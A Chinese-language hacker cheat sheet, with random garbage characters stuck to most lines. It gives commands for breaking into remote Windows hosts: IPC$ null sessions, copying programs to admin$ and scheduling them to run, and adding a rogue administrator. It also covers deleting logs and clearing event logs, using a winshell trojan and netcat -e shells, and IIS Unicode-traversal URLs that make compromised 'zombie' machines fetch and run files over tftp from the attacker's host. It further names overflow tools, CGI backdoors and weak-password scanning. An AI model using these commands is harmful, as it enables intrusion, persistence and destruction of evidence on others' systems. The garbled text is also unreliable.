网管和黑客都必须知道的命令
!Bv"S0 常用的几条NET命令:
U Ux] xjOj1Hv (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
-H3tBEvoI 9N [PZD (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
x}W,B,q G Uf[Dz (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
|@x^5Ab$T aF9p%HPDw (查看远程主机时间) net time \\IP地址
]mN'Qoc >h0iq (定时启动某个程序) at \\IP地址 02:18 readme.exe
GN4'LU #S/]=D (查看共享) net view \\IP地址
_JZwd9K XA~Cc<v (查看netbios工作组列表) nbtstat -A IP地址
/R@,c
B= S0\;FmLIc (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
3TRzDE(J iINd*eXb^ (这两条把自己增加到管理员组): net user 用户名 密码 /add
nVF?.c |&+0Tg~ZE net localgroup Administrators 用户名 /add
fWx
%?J cuO)cj]@e (断开连接) net use \\IP地址\ipc$ /delete
oh
k.; FC:Z9 {2! 扫尾:
)Jx +R;Z &@O]' del C:\winnt\system32\logfiles\*.*
prvvr;Ib 8\?7k del C:\winnt\ssytem32\config\*.evt
d%:B,bck P8N`t&r"7 del C:\winnt\system32\dtclog\*.*
TBN0u k @)A) cBv# del C:\winnt\system32\*.log
]d$:R`; #V[j Q Vl del C:\winnt\system32\*.txt
g\CRx^s mXd,{b' del C:\winnt\*.txt
$4^cbk =.=4P~T& del C:\winnt\*.log
zW^_w&fd^j B{UL(6\B 一、netsvc.exe
OOzk@j^ {sn RS)- 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
WaY_{)x DJxe3< netsvc /list \\IP地址
{:U zW\5l) uhi(Gny. netsvc schedule \\IP地址 /query
8$k `bZ `mar-r_m netsvc \\IP地址 schedule /start
00Tm]mMQX j_::#?o!/ 二、OpenTelnet.exe
: +Na8\d "gD]K= 远程启动主机的Telnet服务,并绑定端口到7878,例如:
i3bH^WwE&k )Gf"#TM[ OpenTelnet \\IP地址 用户名 密码 1 7878
Wpgp YcPS o~Jce$X 然后就可以telnet到主机的7878端口,进入DOS方式下:
2YT1]x 3 en6Kdqe telnet IP地址 7878
i2. +E&3v !i>&z? 三、winshell.exe
#&fi[|%X$ ;WydXQ}Q^ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
Q"o* \I EL*OeyU1l p Path (查看winshell主程序的路径信息)
I4[sf /y8=r"'G b reBoot (重新启动机器)
C[E[|s*l ?8ZOiY( d shutDown (关闭机器)
<c`+ fPW ZGILV s Shell (执行后你就会看到可爱的“C:\>”)
K fM6(f: Gi=sJV x eXit (退出本次登录会话,此命令并不终止winshell的运行)
,]A|z ~q gLm ]* CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
mEL<d,XhI }XOTK^YA 四、3389登陆器,GUI方式登录远程主机的
(8JL/S;Z$ g 0Rny 五、elsave.exe
ld *W\ w'[^RZW:j 事件日志清除工具
HuVx^y`
@ y7f,]<%e_ elsave -s \\IP地址 -l "application" -C
l(irNKutgo !hMD>B2Z elsave -s \\IP地址 -l "system" -C
}da}vR"iL P\jnht elsave -s \\IP地址 -l "security" -C
5|nT5oS x9DG87P~+ 执行后成功清除应用程序日志,系统日志,安全日志
<0EVq8h D^_]x51> 六、hbulot.exe
/$EX-!ie aXv[~ 开启win2kserver和winxp的3389服务
VVd9VGvh J Wh5gOXd hbulot [/r]
`\p5!Iq
Q 6dH> 0l 使用/r表示安装完成后自动重起目标使设置生效。
QPD[uJ(I `>HM<Nn-0 七、nc.exe(netcat.exe)
!t;B.[U * %qycxEVP 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
j7(S= )ajF ca@v 想要连接到某处: nc [-options] hostname port[s] [ports] ...
qsA`\%]H {)CN.z:O 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
:@~Nszlb Wr j<}L| 参数:
b41f7t= &UFj
U%Z% -e prog 程序重定向,一旦连接,就执行 [危险!!]
M?gc&2Y -X]?ql*%` -g gateway source-routing hop point[s], up to 8
j7XUFA B4#XQ- -G num source-routing pointer: 4, 8, 12, ...
M#u~]?hS VYo2m -h 帮助信息
{ Mv$~T|e7 LykB2]T -i secs 延时的间隔
yq=rv$.s nb30<h -l 监听模式,用于入站连接
Pb]EpyAW V[#$Sz[G -n 指定数字的IP地址,不能用hostname
IaHu$` v Z,"f2UJ -o file 记录16进制的传输
%.rVIc" %wQE
lkB -p port 本地端口号
k .#I ;7 9Qb6ek -r 任意指定本地及远程端口
7Eo;TNbb y5/LH~&Ov -s addr 本地源地址
lD-HQd v.!e1ke8D* -u UDP模式
Q`zW[Y&] K})w -v 详细输出——用两个-v可得到更详细的内容
~(x"Y\PEu 0%
zy 6{ -w secs timeout的时间
3+WmM4| 2EC<8}CG -z 将输入输出关掉——用于扫描时
6
=H]p1p~O 八、TFTPD32.EXE
2{9%E6%# %0_}usrsk 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
\"|7o8 O!k C http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
,382O$C .FeVbZW 然后可以直接令文件运行:
#/
HQ?3h] <3fY,qw http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
}G ^nK m s(8e)0Tl 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
m:)sUC0 Xk9 8%gv 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
miB+'n"zS XR+ 一、一 Xscan命令行运行参数说明:
0]Qk *u< A(D3wctdr 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
ly::? 1'!%$D 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
>c=-uI -J;;6aA xscan -file <主机列表文件名> <检测项目> [其他选项]
71c(Nw~iQ i'3)5 其中<检测项目> 含义如下:
Y(;u)uN_ Hn}m}A -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
OV/
&'rC M&}_3 -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
?>DwNz^.! i}/Het+( -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Gg y7xb 9;ie[sU:u -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
Ge ?Q)N ,*Z/3at}5M -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
NL-V",gI-~ yJ*g ; [其他选项] 含义如下:
|&_(I 8 Y))/]R -v: 显示详细扫描进度
N6BEl55 & >">grDX -p: 跳过Ping不通的主机
l{Xy %8 ~_|CXPiQ8 -o: 跳过没有检测到开放端口的主机
$msf~M* ;v5Jps2^] -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10